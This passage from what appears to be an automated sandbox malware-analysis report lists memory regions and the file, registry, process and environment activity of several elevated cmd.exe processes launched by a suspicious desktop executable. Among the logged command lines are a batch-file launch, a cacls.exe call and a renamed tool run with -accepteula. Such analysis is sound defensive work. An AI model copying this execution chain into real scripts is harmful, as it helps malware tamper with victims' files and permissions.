| private_0x0000000005000000 | 0x05000000 | 0x0503ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005040000 | 0x05040000 | 0x0513ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000005140000 | 0x05140000 | 0x05143fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000005150000 | 0x05150000 | 0x05150fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000005160000 | 0x05160000 | 0x05161fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005190000 | 0x05190000 | 0x0519ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000051a0000 | 0x051a0000 | 0x0537ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x051a0000 | 0x0525dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000005280000 | 0x05280000 | 0x0537ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005380000 | 0x05380000 | 0x053bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000053c0000 | 0x053c0000 | 0x054bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000054c0000 | 0x054c0000 | 0x055affff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x055b0000 | 0x058e6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e9f0000 | 0x7e9f0000 | 0x7eaeffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007eaf0000 | 0x7eaf0000 | 0x7eb12fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007eb16000 | 0x7eb16000 | 0x7eb18fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eb19000 | 0x7eb19000 | 0x7eb19fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eb1c000 | 0x7eb1c000 | 0x7eb1efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eb1f000 | 0x7eb1f000 | 0x7eb1ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | G13k6QZj.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 24, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe | os_pid = 0xdd4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x930000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x752a2780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7527fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74f835c0 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #213: cmd.exe
88
0
| Information | Value |
|---|---|
| ID | #213 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" "C:\Program Files\Windows Mail\wab.exe"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:23, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:18 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd94 |
| Parent PID | 0xda0 (c:\users\ciihmnxmn6ps\desktop\cary.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
DEC
0x
B10
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x00930000 | 0x0097ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000ab0000 | 0x00ab0000 | 0x04aaffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004ab0000 | 0x04ab0000 | 0x04acffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004ab0000 | 0x04ab0000 | 0x04abffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004ac0000 | 0x04ac0000 | 0x04ac3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ad0000 | 0x04ad0000 | 0x04ad1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ad0000 | 0x04ad0000 | 0x04ad3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004ae0000 | 0x04ae0000 | 0x04af3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004b00000 | 0x04b00000 | 0x04b3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b40000 | 0x04b40000 | 0x04c3ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004c40000 | 0x04c40000 | 0x04c43fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004c50000 | 0x04c50000 | 0x04c50fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004c60000 | 0x04c60000 | 0x04c61fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04c70000 | 0x04d2dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004d30000 | 0x04d30000 | 0x04d6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d70000 | 0x04d70000 | 0x04d7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004df0000 | 0x04df0000 | 0x04dfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e00000 | 0x04e00000 | 0x04ffffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e00000 | 0x04e00000 | 0x04efffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f00000 | 0x04f00000 | 0x04ffffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005000000 | 0x05000000 | 0x0513ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x05140000 | 0x05476fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x748d0000 | 0x748d7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f180000 | 0x7f180000 | 0x7f27ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f280000 | 0x7f280000 | 0x7f2a2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f2a8000 | 0x7f2a8000 | 0x7f2aafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f2ab000 | 0x7f2ab000 | 0x7f2adfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f2ae000 | 0x7f2ae000 | 0x7f2aefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f2af000 | 0x7f2af000 | 0x7f2affff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (40)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
5 | |
| Open | STD_OUTPUT_HANDLE | - |
|
18 | |
| Open | STD_INPUT_HANDLE | - |
|
2 | |
| Open | - | - |
|
4 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 65 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 192, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0xd20, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x930000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x752a2780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7527fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74f835c0 |
|
1 |
Environment (20)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
5 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
3 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
4 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 |
Process #214: cmd.exe
54
0
| Information | Value |
|---|---|
| ID | #214 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c G13k6QZj.exe -accepteula "Dotted_Line.jtp" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:23, Reason: Child Process |
| Unmonitor | End Time: 00:03:29, Reason: Self Terminated |
| Monitor Duration | 00:00:06 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xe60 |
| Parent PID | 0x430 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
DF4
0x
E3C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x00930000 | 0x0097ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000ae0000 | 0x00ae0000 | 0x04adffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004ae0000 | 0x04ae0000 | 0x04afffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004ae0000 | 0x04ae0000 | 0x04aeffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004af0000 | 0x04af0000 | 0x04af3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b00000 | 0x04b00000 | 0x04b01fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b00000 | 0x04b00000 | 0x04b03fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004b10000 | 0x04b10000 | 0x04b23fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004b30000 | 0x04b30000 | 0x04b6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b70000 | 0x04b70000 | 0x04c6ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004c70000 | 0x04c70000 | 0x04c73fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004c80000 | 0x04c80000 | 0x04c80fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004c90000 | 0x04c90000 | 0x04c91fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ca0000 | 0x04ca0000 | 0x04cdffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d30000 | 0x04d30000 | 0x04d3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d40000 | 0x04d40000 | 0x04e9ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04ea0000 | 0x04f5dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004f60000 | 0x04f60000 | 0x0505ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005060000 | 0x05060000 | 0x051effff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x051f0000 | 0x05526fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ee00000 | 0x7ee00000 | 0x7eefffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ef00000 | 0x7ef00000 | 0x7ef22fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ef28000 | 0x7ef28000 | 0x7ef2afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ef2b000 | 0x7ef2b000 | 0x7ef2dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ef2e000 | 0x7ef2e000 | 0x7ef2efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ef2f000 | 0x7ef2f000 | 0x7ef2ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | G13k6QZj.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 184, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe | os_pid = 0xe48, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x930000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x752a2780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7527fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74f835c0 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
